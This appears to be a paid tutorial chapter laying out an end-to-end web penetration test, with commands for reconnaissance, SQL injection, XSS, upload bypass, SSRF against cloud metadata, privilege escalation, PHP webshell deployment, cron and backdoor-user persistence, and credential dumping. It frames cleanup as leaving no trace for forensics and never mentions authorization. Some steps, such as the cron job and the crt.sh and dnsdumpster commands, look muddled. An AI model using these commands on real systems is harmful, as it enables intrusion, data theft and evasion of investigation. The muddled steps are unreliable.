Real‑World: End‑to‑End Penetration Testing

Vibe Prompt

“Plan a comprehensive web penetration test: from information gathering, vulnerability scanning, exploitation, to shell acquisition.”

Full Workflow Overview

Phase 1 – Reconnaissance (1–2 days)
├── OSINT (domain, email, subdomains)
├── Technology Stack Identification
├── Port Scanning (Nmap)
└── Directory Enumeration (Gobuster, Dirb)

Phase 2 – Vulnerability Scanning (1–2 days)
├── Nessus / OpenVAS
├── OWASP ZAP
├── Nikto
└── Nuclei

Phase 3 – Exploitation (2–3 days)
├── SQL Injection (SQLMap)
├── XSS (manual verification)
├── File Upload Bypass
├── SSRF
├── Insecure Direct Object References (IDOR)
└── Privilege Escalation

Phase 4 – Post‑Exploitation (1 day)
├── Webshell Deployment
├── Persistence
├── Lateral Movement
├── Sensitive Data Collection
└── Cleanup & Takedown

Phase 5 – Reporting (1–2 days)
├── Vulnerability Summary
├── Risk Rating (CVSS)
├── Remediation Guidance
└── Appendix (Payloads, Screenshots)

What?

This workflow is a proven, repeatable process that covers every stage of a penetration test. It ensures that no critical step—reconnaissance, scanning, exploitation, post‑exploitation, or reporting—is omitted.

Why?

For developers and founders, a structured approach reduces the risk of costly security incidents. It also demonstrates compliance with industry standards (e.g., OWASP ASVS, NIST SP 800‑115) and can be a selling point for security‑centric customers. A well‑documented test can lower insurance premiums and provide a clear ROI by preventing data breaches that could cost millions.

How?

Using Vibe Coding, you can automate many of these steps, integrate them into CI/CD pipelines, and generate reproducible reports. Below we detail each phase with commands, tools, and Vibe‑specific scripts.


Phase 1 – Reconnaissance

1.1 OSINT

| Tool | Purpose | Vibe Integration | |------|---------|------------------| | theHarvester | Gather emails, subdomains, hosts | vibe run theHarvester -d target.com -b all -l 1000 | | crt.sh | Discover certificates for subdomains | vibe run crt.sh -d target.com | | dnsdumpster | DNS enumeration | vibe run dnsdumpster -d target.com |

Why?
Early discovery of the attack surface limits the scope of the test and ensures you focus on real assets.

How?
Create a Vibe task file recon.yml:

tasks:
  - name: Gather subdomains
    command: theHarvester -d target.com -b all -l 1000
  - name: Certificate enumeration
    command: crt.sh -d target.com
  - name: DNS dump
    command: dnsdumpster -d target.com

Run with vibe run recon.yml.

1.2 Technology Stack Identification

| Tool | Purpose | Vibe Integration | |------|---------|------------------| | WhatWeb | Detect web server, CMS, frameworks | vibe run whatweb -a 3 target.com | | Wappalyzer | Browser extension or CLI | vibe run wappalyzer target.com |

Why?
Knowing the stack informs which vulnerability libraries and exploits are relevant.

How?
Add to recon.yml:

  - name: Detect stack
    command: whatweb -a 3 target.com

1.3 Port Scanning (Nmap)

# Full scan
nmap -sV -sC -O -A -p- -T4 target.com -oA nmap_report

# Parameters explained
# -sV: Service/version detection
# -sC: Default scripts
# -O: OS detection
# -A: Aggressive scan (includes OS, version, script, traceroute)
# -p-: Scan all 65535 ports
# -T4: Aggressive timing
# -oA: Output in all formats (xml, nmap, grepable)

Why?
Open ports reveal potential entry points and help prioritize scanning.

How?
Create a Vibe task:

  - name: Nmap full scan
    command: nmap -sV -sC -O -A -p- -T4 target.com -oA nmap_report

1.4 Directory Enumeration (Gobuster)

gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50
gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30

Why?
Hidden directories often host admin panels, API endpoints, or legacy services.

How?
Add to Vibe:

  - name: Gobuster directory
    command: gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50
  - name: Gobuster vhost
    command: gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30

Phase 2 – Vulnerability Scanning

2.1 Nessus / OpenVAS

| Tool | Purpose | Vibe Integration | |------|---------|------------------| | Nessus | Comprehensive vulnerability scanner | vibe run nessus -s target.com | | OpenVAS | Open‑source alternative | vibe run openvas -s target.com |

Why?
Automated scanners surface known CVEs, misconfigurations, and missing patches.

How?
Define a Vibe task:

  - name: Nessus scan
    command: nessus -s target.com

2.2 OWASP ZAP

zap.sh -daemon -port 8090 -config api.disablekey=true

Why?
ZAP is ideal for dynamic web application testing, especially for APIs.

How?
Create a Vibe task:

  - name: Start ZAP
    command: zap.sh -daemon -port 8090 -config api.disablekey=true

2.3 Nikto

nikto -h https://target.com -o nikto_report.txt

Why?
Nikto checks for outdated software, default files, and common misconfigurations.

How?
Vibe task:

  - name: Nikto scan
    command: nikto -h https://target.com -o nikto_report.txt

2.4 Nuclei

nuclei -u https://target.com -t nuclei-templates/ -o nuclei_report.txt

Why?
Nuclei uses a large template library for quick detection of known vulnerabilities.

How?
Vibe task:

  - name: Nuclei scan
    command: nuclei -u https://target.com -t nuclei-templates/ -o nuclei_report.txt

Phase 3 – Exploitation

3.1 SQL Injection (SQLMap)

# Basic injection
sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2

# List databases
sqlmap -u "https://target.com/products?id=1" --batch --dbs

# List tables in a database
sqlmap -u "https://target.com/products?id=1" --batch -D mydb --tables

# Dump a table
sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump

# Get OS shell
sqlmap -u "https://target.com/products?id=1" --batch --os-shell

Why?
SQL injection can lead to data exfiltration, privilege escalation, or remote code execution.

How?
Wrap each command in a Vibe task:

  - name: SQLMap basic
    command: sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2
  - name: SQLMap dump users
    command: sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump

3.2 Cross‑Site Scripting (XSS)

| Technique | Tool | Vibe Integration | |-----------|------|------------------| | Reflected XSS | Burp Intruder | vibe run burp_intruder -t target.com -p /search?q=... | | Stored XSS | Manual injection | vibe run curl -X POST -d "comment=...<script>alert(1)</script>" https://target.com/api/comments |

Why?
XSS can hijack sessions, deface sites, or execute arbitrary scripts.

How?
Create a Vibe task for Burp Intruder:

  - name: Burp Intruder XSS
    command: burp_intruder -t target.com -p /search?q=... -payload "<script>alert(1)</script>"

3.3 File Upload Bypass

| Vulnerability | Exploit | Vibe Integration | |---------------|---------|------------------| | MIME type mismatch | Upload a PHP file disguised as image | vibe run curl -F "file=@/tmp/shell.php" https://target.com/upload | | Directory traversal | ../../../../etc/passwd | vibe run curl -F "file=@/etc/passwd" https://target.com/upload |

Why?
Allows arbitrary code execution on the server.

How?
Vibe task:

  - name: File upload bypass
    command: curl -F "file=@/tmp/shell.php" https://target.com/upload

3.4 Server‑Side Request Forgery (SSRF)

curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" https://target.com/api/ssrf

Why?
SSRF can access internal services, leak secrets, or pivot to other hosts.

How?
Vibe task:

  - name: SSRF test
    command: curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" https://target.com/api/ssrf

3.5 Insecure Direct Object References (IDOR)

curl -X GET https://target.com/api/users/123
curl -X GET https://target.com/api/users/124

Why?
Allows attackers to read or modify data belonging to other users.

How?
Vibe task:

  - name: IDOR test
    command: |
      for id in 123 124 125; do
        curl -X GET https://target.com/api/users/$id
      done

3.6 Privilege Escalation

# Linux PE script
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# Common checks
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab
uname -a
cat /etc/os-release

Why?
Even if initial access is limited, privilege escalation can grant full control.

How?
Create a Vibe task:

  - name: Run linPEAS
    command: |
      wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
      chmod +x linpeas.sh
      ./linpeas.sh

Phase 4 – Post‑Exploitation

4.1 Webshell Deployment

| Tool | Payload | Vibe Integration | |------|---------|------------------| | php | <?php system($_GET['cmd']); ?> | vibe run curl -F "file=@/tmp/shell.php" https://target.com/upload | | Node.js | require('child_process').execSync(process.argv[2]) | vibe run curl -F "file=@/tmp/shell.js" https://target.com/upload |

Why?
Provides a persistent command interface for further exploitation.

How?
Vibe task:

  - name: Deploy PHP webshell
    command: curl -F "file=@/tmp/shell.php" https://target.com/upload

4.2 Persistence

  • Create a cron job that re‑uploads the shell.
  • Add a new user with sudo privileges.

Why?
Ensures continued access even after remediation.

How?
Vibe tasks:

  - name: Add cron job
    command: echo "* * * * * root /usr/bin/curl -F 'file=@/tmp/shell.php' https://target.com/upload" >> /etc/crontab
  - name: Add privileged user
    command: useradd -m -s /bin/bash attacker && echo "attacker:password" | chpasswd && usermod -aG sudo attacker

4.3 Lateral Movement

  • Enumerate other hosts via nmap -sP 10.0.0.0/24.
  • Exploit SMB shares or SSH keys.

Why?
Expands the attack surface and can reach critical assets.

How?
Vibe task:

  - name: Scan internal network
    command: nmap -sP 10.0.0.0/24 -oG internal_hosts.txt

4.4 Sensitive Data Collection

  • Dump database credentials.
  • Retrieve API keys from environment variables.

Why?
Data exfiltration is the primary business impact of a breach.

How?
Vibe task:

  - name: Dump credentials
    command: cat /etc/credentials.txt

4.5 Cleanup & Takedown

  • Delete uploaded files.
  • Remove cron jobs and users.

Why?
Leaves no trace for forensic analysis.

How?

  - name: Remove webshell
    command: rm -f /var/www/html/shell.php
  - name: Delete user
    command: userdel -r attacker

Phase 5 – Reporting

5.1 Report Template (Markdown)

# Penetration Test Report

## Executive Summary
- **Target:** https://vibe-tutor.com
- **Scope:** Full web application and API surface
- **Duration:** 2026‑06‑30 to 2026‑07‑02
- **Findings:** 7 vulnerabilities (High: 2, Medium: 3, Low: 2)
- **Average CVSS:** 7.2

## High‑Risk Vulnerabilities

### H‑01: SQL Injection in /api/products
- **Description:** Unsanitized `id` parameter allows SQL injection.
- **CVSS:** 9.1 (Critical)
- **Evidence:** SQLMap successfully dumped `users` table.
- **Remediation:** Implement parameterized queries and input validation.

### H‑02: Broken Access Control in /api/admin
- **Description:** No authentication for admin endpoints.
- **CVSS:** 8.2 (High)
- **Evidence:** Direct access to `/api/admin/users` returned all user data.
- **Remediation:** Add role‑based middleware and enforce JWT validation.

## Medium‑Risk Vulnerabilities
... (details omitted for brevity)

## Low‑Risk Vulnerabilities
... (details omitted for brevity)

## Appendix
- **Payloads:** List of all payloads used.
- **Screenshots:** Attach relevant screenshots.
- **Logs:** Include scan logs and exploitation outputs.

5.2 How to Generate the Report with Vibe

Create a Vibe task:

  - name: Generate report
    command: |
      echo "# Penetration Test Report" > report.md
      echo "## Executive Summary" >> report.md
      # Append findings programmatically

You can automate the insertion of findings by parsing scan outputs and using a templating engine like Jinja2 within Vibe

Unlock Full Tutorial

This chapter is paid content. Join the project to unlock over 5000 words of deep analysis, including 10+ god-tier Prompts and real Source Code examples!